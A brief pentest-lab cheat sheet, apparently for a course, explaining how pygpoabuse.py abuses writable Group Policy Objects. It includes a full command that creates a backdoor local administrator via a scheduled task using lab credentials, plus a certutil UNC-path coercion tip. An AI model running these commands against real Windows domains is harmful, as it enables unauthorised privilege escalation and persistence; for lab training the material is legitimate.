# pygpoabuse.py

Very cool utility to abuse GPO objects where you have excessive permissions, such as GenericWrite. Here's an example:

pygpoabuse.py north.sevenkingdoms.local/samwell.tarly:'Heartsbane' -gpo-id "THE ID YOU COPIED MINUS THE CURLY BRACES" -command "net user BACKDOORUSER Mypass123! /add && net localgroup administrators YOURSTUDENTLOGIN /add" -taskname "Whatever you wanna call the task" -v

In the command above:

THE ID YOU COPIED MINUS THE CURLY BRACES - is exactly that: the ID you copy off the GPO in BloodHound, minus the curly braces.
BACKDOORUSER would be a local admin account you want to install on the system.
Mypass123! - is the password that will be assigned to your backdoor account. IMPORTANT: MAKE THE PASSWORD FEWER THAN 14 CHARACTERS!
-taskname "Whatever you wanna call the task" - is exactly that: some name for the scheduled task that gets queued up behind the scenes.

Tip

When using this to summon a command such as -command "certutil -syncwithwu \\\\10.1.2.3" you'll want to escape backslashes in a UNC path with double backslashes.